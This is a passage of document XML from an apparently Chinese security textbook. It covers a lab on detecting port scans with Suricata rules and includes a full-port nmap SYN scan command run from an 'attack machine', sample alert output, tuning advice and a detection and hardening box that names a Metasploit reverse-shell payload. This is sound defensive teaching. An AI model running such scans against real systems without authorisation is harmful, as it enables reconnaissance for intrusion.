          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">之后的每个包都产生告警（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">type both</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示达到阈值时生成一条告警，之后每多一个包再生成一条）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">启动</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata（使用自定义规则并指定监听接口）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/suricata/suricata.yaml </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">MONITOR_INTERFACE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> -S /etc/suricata/rules/local.rules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第三步：在攻击机执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Nmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">扫描并观察告警</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">攻击机（Kali）执行：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-sS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-p-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">TARGET_IP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># 全端口 SYN 扫描</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象：扫描启动几秒后，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">eve.json</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">日志（JSON</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">格式的结构化告警日志）或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fast.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（单行快速查看日志）中出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sid:1000010</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的告警记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">fast.log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">tail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /var/log/suricata/fast.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期输出类似（时间戳和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为占位符）：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;timestamp&gt; [1:1000010:1] SCAN TCP SYN portscan detected {TCP} &lt;ATTACKER_IP&gt;:&lt;PORT&gt; -&gt; &lt;TARGET_IP&gt;:&lt;PORT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">第四步：排错与权衡调优</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">若未触发告警：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">确认规则文件路径</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">-S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">参数指定的路径是否正确，Suricata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是否有该文件的读权限。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">确认接口流量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcpdump -i &lt;MONITOR_INTERFACE&gt; host &lt;TARGET_IP&gt; and tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">能否看到扫描流量。如果抓不到包，考虑网卡混杂模式未开启、SPAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口未配置或虚拟交换机策略限制。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">阈值参数调整</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">count 20, seconds 5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表示</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">秒</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包。如果靶机开放端口较少（如只开放</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个端口），Nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可能不发足</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">包。可降低</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">值或缩短</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">seconds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">窗口以提高灵敏度。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">误报权衡的根本矛盾在于：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">太低</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正常端口扫描器/网络管理软件可能触警（误报↑）；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">count</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">太高</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">慢速扫描（攻击者以极低速率发包）漏检（漏报↑）。这就是入侵检测工程中的经典</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">ROC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">曲线权衡</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">——每一次灵敏度提升都伴随特异度下降，反之亦然。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="332"/>
    <w:bookmarkStart w:id="338" w:name="防御对照框检测与修复"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：检测与修复</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测层面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Snort/Suricata </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">规则覆盖</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：部署上述端口扫描检测规则，并结合</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ET SCAN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类（Emerging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Threats </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">开源规则集的扫描类型规则）进行多层检测。针对</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的已知默认载荷（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">windows/meterpreter/reverse_tcp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等，回指</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Ch17），Emerging</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Threats </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Snort </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">官方社区规则集已提供较完善的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EXPLOIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">MALWARE-CNC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">类规则，涵盖</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">生成</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Payload </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的流量指纹。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">NetFlow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">异常分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：端口扫描在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NetFlow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">流记录中表现为“源</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">目的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的短流数量突增，且每流数据包数极少（多为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 1–3 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">个包）”。可设置基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NetFlow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的异常阈值检测器，用于补充</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NIDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">因性能原因关闭规则后的覆盖缺口。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复与加固层面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（详见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Ch20 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">纵深防御）：将高价值资产置于独立</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">VLAN/子网，在防火墙</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ACL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中仅开放必需端口，使外部攻击者的扫描结果价值最小化。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">主机层面减少攻击面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在服务器上关闭不必要的监听端口，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nftables</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">host firewall </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为纵深防御的底层层，即可检测出站试探。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志审计与溯源</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：端口扫描告警与防火墙拒绝日志交叉关联，结合威胁情报判断扫描源</w:t>
      </w:r>
      <w:r>
